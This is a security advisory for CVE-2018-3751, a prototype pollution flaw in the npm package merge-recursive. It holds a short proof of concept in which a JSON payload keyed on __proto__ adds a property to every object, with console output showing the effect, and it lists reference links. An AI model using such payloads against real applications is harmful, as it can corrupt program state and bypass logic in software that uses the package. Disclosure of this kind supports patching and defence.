All versions of merge-recursive are vulnerable to Prototype Pollution. When malicious user input is merged with another object it allows the attacker to modify the prototype of Object via __proto__ causing the addition or modification of an existing property.

Proof of concept:

var merge = require('merge-recursive').recursive;
var malicious_payload = '{"__proto__":{"oops":"It works !"}}';

var a = {};
console.log("Before : " + a.oops);
merge({}, JSON.parse(malicious_payload));
console.log("After : " + a.oops);

Recommendation

There is currently no fix available.

References

• https://nvd.nist.gov/vuln/detail/CVE-2018-3751
• https://hackerone.com/reports/311337
• GHSA-cvxm-f295-x957
• https://www.npmjs.com/advisories/715